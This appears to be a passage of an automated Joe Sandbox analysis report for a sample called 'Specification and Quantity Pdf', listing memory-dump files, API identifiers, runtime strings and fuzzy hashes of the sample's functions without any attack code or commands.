            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
            • String ID: SeLockMemoryPrivilege
            • API String ID: 1752251271-475654710
            • Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
            • Instruction ID: 64783e75d21b47741055ecdbc9b43f0d5f00a11eed71f123709bcb71ff871f58
            • Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
            • Instruction Fuzzy Hash: FF318773A3CA42C6F7A0ABA1F404366A7A1EB447DDF844035DA8E17694DF3CD4488710
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: SwitchThread$BreakCounterDebugPerformanceQuery
            • String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
            • API String ID: 30421299-2108734148
            • Opcode ID: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
            • Instruction ID: 7b7b1c923bb21aeacb390f34d01ff8ab11cdb42adfabe8f4b479833f70103d34
            • Opcode Fuzzy Hash: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
            • Instruction Fuzzy Hash: 90C2A023A3E74681FAD1AB64E8503B4B7A4AF45B88F944236DD4D633E5DF3DE4518320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: SwitchThread$BreakDebug
            • String ID:
            • API String ID: 223621376-0
            • Opcode ID: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
            • Instruction ID: 03985370734362846288778a995164e05e20f4f5d69bcbcf97f87338eae9e695
            • Opcode Fuzzy Hash: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
            • Instruction Fuzzy Hash: B1B2BB33A3C64685EAE4AB65A8403B8B7A4EF45795F984236DD5D273E1DF3CE490C320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug$CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3888577265-0
            • Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
            • Instruction ID: 1b94b4ff996961deb512bcab3cad0be3ff45cc4c58636866afef564fd9e231f4
            • Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
            • Instruction Fuzzy Hash: 55129033A3E74681EAE1AB55A4403B9B7A8FF94B88F944136CA4D273D5DF3CE550C260
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug$CriticalSection$EnterLeave
            • String ID:
            • API String ID: 3888577265-0
            • Opcode ID: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
            • Instruction ID: d1095343220137f663f7e83084366b6974661b1c1bbbab5904e51afb4fd3dbc3
            • Opcode Fuzzy Hash: c44e6f749cf51194d18055909887b503eb6a2aff37391a8996bb50217290c366
            • Instruction Fuzzy Hash: 1F029077A3D68286EBD4AB6595403B8B7A1FB44B84F984136CA4D237E1DF3CE561C320
            APIs
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56B07
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56C51
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56D33
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56D49
            • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00000000,?,00007FF773C573A0), ref: 00007FF773C56DBE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: ExceptionFailFastRaise
            • String ID: [ KeepUnwinding ]
            • API String ID: 2546344036-400895726
            • Opcode ID: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
            • Instruction ID: 06a5d3b04d4b6476a169ed3c1c8e96fa2853bec2f8873e5ea305ce71101586fd
            • Opcode Fuzzy Hash: 37b542edfd6e6a04d6d6af4a5e84d7cb03416debfb2b6644f32ce5e3f49ff12d
            • Instruction Fuzzy Hash: 2CB14B33629B4181EBD0AF25D4416B9B3A5FB45B48FA85136CE4D273D8CF39E465C320
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
            • String ID:
            • API String ID: 2933794660-0
            • Opcode ID: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
            • Instruction ID: 46d7dfc9cd4e7b33c369718146b0749c15727cabb71653e3e221ed4c98afcfdf
            • Opcode Fuzzy Hash: 41e4741397a1d2276859ccb546066f9b7c88a4a65b19eb4148268b3bcac57992
            • Instruction Fuzzy Hash: 0F115E22B38F058AEB40DFA0E8442B873A4FB59758F840E31EAAD527A4DF7CD1658350
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: SwitchThread
            • String ID:
            • API String ID: 115865932-0
            • Opcode ID: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
            • Instruction ID: 8c2215ac9532ee565fdd673ed3bb5d4ff4fb823a9e7fc9ad27393431dce2c2ef
            • Opcode Fuzzy Hash: ddf5a7c59728b91961856a1f3de8d77b860fc2794b24d806c874d2325e124f05
            • Instruction Fuzzy Hash: 34D19E33A3868585EBA0AF15D4046AAF3A1FB85B94F844536DA9D637CCDF3CE540C720
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakDebug
            • String ID:
            • API String ID: 456121617-0
            • Opcode ID: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
            • Instruction ID: d46fb13b92764f7214f0ab656044ad5d81c07f1aa5b91fd78c6fdc700a162180
            • Opcode Fuzzy Hash: 24780f21546bd015505d40b07dff922e5db3dc92a0b137180c1451863a2d226f
            • Instruction Fuzzy Hash: 9AE1C033A39A8685EB90AF69D844278B7A4EF10B95F900236DD5D277E4DF3CE451C360
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BuffersFlushProcessWrite
            • String ID:
            • API String ID: 2982998374-0
            • Opcode ID: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
            • Instruction ID: 48f1df838f77d748c38f6852aadf25f760cc8777a811f69eca90df6bc7b88447
            • Opcode Fuzzy Hash: 79d0f43756a16d64338861bbba21ee80fd32cc7b8ee7bde5ac8cae3f237e486d
            • Instruction Fuzzy Hash: 69510E93B387D146EEA1EA6464103F9EA90EB517D4F9A8131CE5D6B7D1EE3CD540C310
            APIs
            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF773C54896,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C60531
            • GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF773C54896,?,?,?,?,?,?,00007FF773C51EA0), ref: 00007FF773C60590
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: EnabledFeaturesState
            • String ID:
            • API String ID: 1557480591-0
            • Opcode ID: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
            • Instruction ID: 0d85291986de6f57a01c37138f858cd8fb101a9da3b7caf90828f9ea68e288c1
            • Opcode Fuzzy Hash: 6a010aaf3d9dfb2ad17c8b6f662b67376a88e00fe7fb95adbc059e65881bfa60
            • Instruction Fuzzy Hash: 7851CE33E3C62686FFE8645994A937982839BD535CF858538CE4E732C2CD7ED8428225
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: @
            • API String ID: 0-2766056989
            • Opcode ID: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
            • Instruction ID: 6668541d9ed449ea2bc830f55623bdeb902b43501af480014eb0c0c71549c78c
            • Opcode Fuzzy Hash: 6e82094639824c14ab4293de4ec13a988e764ae228435d9a0dabbc53190a5c10
            • Instruction Fuzzy Hash: 6962C0B3B25B0687EB489F28C55177976A5FB94B88FA58036CA0E537D8DF38D910C780
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: BreakCounterCreateDebugEventPerformanceQuery
            • String ID:
            • API String ID: 4239280443-0
            • Opcode ID: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
            • Instruction ID: 9db2ee04fa9f551a0ab31fd996578e9e3c116d6d7e9e3e5a2412c6f2f66d31d9
            • Opcode Fuzzy Hash: 5491d3f8da2e797241490e3cda2db23de3b51a53647b4561e21f0ad4d068944b
            • Instruction Fuzzy Hash: 50420A33D3DB4285E791ABA4B880274B3A4FF59744F94923AD98C32765DF3CA1A1D360
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID: Count64Tick
            • String ID:
            • API String ID: 1927824332-0
            • Opcode ID: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
            • Instruction ID: 8e41631b5ecd73e6c04abd1b42b06ad42c3d84d0581dd8c6a239e4295e4d0189
            • Opcode Fuzzy Hash: d5b68029aa416122ce9160fa44b138e07519b76c0a8e0ce365ee1a4a9db7f319
            • Instruction Fuzzy Hash: CAD1B333A3C64686F794ABA1D44467DA3A1BB40788F924835DE0E676A5DF38E881C760
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID: 0-3916222277
            • Opcode ID: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
            • Instruction ID: a15e8d22e8cbe98c6f0f4f8060acf224ca9fbce388da292b7e356ec92382e268
            • Opcode Fuzzy Hash: cd09ef96d8f17e625544f5d09aacbfbf5b704350f56f2afae0a11c1b875b7772
            • Instruction Fuzzy Hash: 2342B637A3DA4685EA91AF59E8406B9B7A1FF017A0F845232C96D637D4CF3DE560C320
            Strings
            • ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}, xrefs: 00007FF773C7A256
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: ========== ENDGC %d (gen = %lu, collect_classes = %lu) ===========}
            • API String ID: 0-2256439813
            • Opcode ID: 3d9c7d8b7c0ab8532314e1187208e6530c88a17523e66e958ad062fb87e6edbc
            • Instruction ID: bc65366adb3ebdccd13ccb2c89b9efd3b08d34f1e8d4ce8b997b4b49902544ef
            • Opcode Fuzzy Hash: 3d9c7d8b7c0ab8532314e1187208e6530c88a17523e66e958ad062fb87e6edbc
            • Instruction Fuzzy Hash: F7429F33A3DB8686EA95AB68D840378B7A5FF05744F944136CA8D273A1DF3DE065C360
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
            • Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd
            Similarity
            • API ID:
            • String ID: ?
            • API String ID: 0-1684325040
            • Opcode ID: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
            • Instruction ID: 1ab80c8e4c6f2eed879afa81dcca621aa4f64c2576f2e8f3a21f9802604ada47
            • Opcode Fuzzy Hash: c36884137a1fbdc5629651c62ab30761a03d17dd0682946ebc7bc0764feb72a2
            • Instruction Fuzzy Hash: DD12BE33A38A42C2EA90EB25E5446B9B3A5FB85B98F944232DA5D237D4DF3DE051C710
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true
